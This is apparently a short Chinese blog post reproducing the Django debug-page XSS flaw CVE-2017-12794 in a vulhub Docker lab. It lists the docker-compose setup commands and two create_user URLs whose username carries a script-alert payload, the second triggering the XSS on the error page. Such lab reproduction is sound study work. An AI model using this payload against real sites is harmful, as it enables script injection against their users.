Django发布了新版本1.11.5,修复了500页面中可能存在的一个XSS漏洞。[1]
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明Django debug page XSS漏洞(CVE-2017-12794)环境搭建成功了
先创建用户:<script>alert(520)</script>
http://144.34.162.13:8000/create_user/?username=<script>alert(520)</script>
再创建用户:<script>alert(520)</script>,触发XSS漏洞
http://144.34.162.13:8000/create_user/?username=<script>alert(520)</script>
参考^Django debug page XSS漏洞(CVE-2017-12794)分析 https://vulhub.org/#/environments/django/CVE-2017-12794/ 